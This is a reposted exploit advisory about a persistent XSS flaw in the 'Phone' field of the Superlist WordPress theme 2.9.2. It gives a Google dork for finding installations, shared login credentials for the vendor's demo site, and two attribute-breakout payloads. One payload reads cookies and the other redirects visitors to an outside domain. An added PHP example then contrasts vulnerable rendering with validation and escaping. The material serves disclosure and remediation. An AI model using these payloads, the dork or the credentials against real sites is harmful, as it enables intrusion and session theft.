Superlist - Directory WordPress Theme v2.9.2 Persistent XSS

2019.12.02
SubversA (RU)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Superlist - Directory WordPress Theme v2.9.2 Persistent XSS
# Google Dork: /wp-content/themes/superlist/
# Date: 02/12/2019
# Exploit Author: SUBVΞRSΛ
# Vendor Homepage: https://byaviators.com/en/
# Software Link: https://themeforest.net/item/superlist-directory-wordpress-theme/13507181
# Version: 2.9.2 [ 2.880 Sales ]
# Tested on: Parrot OS
# CVE : -
# CWE : 79

----[]- Persistent XSS: -[]----

You need a new basic user account (register your own here https://superlist.byaviators.com/create/?type=job or use mine: subversa/subversa). Then go to the https://superlist.byaviators.com/create/?type=job&step=contact page, which is the «Contact» step of the new listing submission form.

There you'll see the vulnerable input fields, e.g. «Phone». Use a payload like the ones provided below and save your listing.

The point is that you need to «break» the «Phone» <a> tag and inject the desired payload inside it. All data from the form steps is stored as a cookie.

Payload Sample #0:
" /onmouseover="alert(document.cookie);" /onauxclick="alert(document.domain);"

Payload Sample #1:
" /onmouseover="console.log(`SUBVΞRSΛ`);" /onauxclick="alert(`PoC`);window.location.replace(`http://defcon.su`);"
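One way to close the attribute breakout described above, as an added example that is not the theme's code or the advisory author's. It assumes the «Phone» value is rendered as `<a href="tel:...">`, which the advisory does not show, and all function names are hypothetical.

```php
<?php
// Added illustration, not the Superlist theme's code. The <a href="tel:...">
// template shape and every function name here are assumptions.

// Vulnerable pattern: the stored value is concatenated into the attribute
// as-is, so a double quote closes href="" and starts attacker-chosen attributes.
function render_phone_unsafe(string $phone): string
{
    return '<a href="tel:' . $phone . '">' . $phone . '</a>';
}

// Save-time check: accept only the characters a phone number needs.
function validate_phone(string $phone): ?string
{
    $phone = trim($phone);
    return preg_match('/^\+?[0-9 ().-]{3,30}$/', $phone) === 1 ? $phone : null;
}

// Render-time fix: encode for the HTML context on every output, which also
// covers values stored before validation existed. In a WordPress template
// the equivalent calls are esc_attr() and esc_html().
function render_phone_safe(string $phone): string
{
    $digits = (string) preg_replace('/[^0-9+]/', '', $phone);
    $attr = htmlspecialchars($digits, ENT_QUOTES, 'UTF-8');
    $text = htmlspecialchars($phone, ENT_QUOTES, 'UTF-8');
    return '<a href="tel:' . $attr . '">' . $text . '</a>';
}

// Constructed sample rows; the second is Payload Sample #0 from the advisory.
$stored = [
    '+420 123 456 789',
    '" /onmouseover="alert(document.cookie);" /onauxclick="alert(document.domain);"',
];

foreach ($stored as $value) {
    echo 'accepted at save time: ', var_export(validate_phone($value) !== null, true), PHP_EOL;
    echo 'unsafe render: ', render_phone_unsafe($value), PHP_EOL;
    echo 'safe render:   ', render_phone_safe($value), PHP_EOL, PHP_EOL;
}
```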



Copyright 2019, cxsecurity.com

 
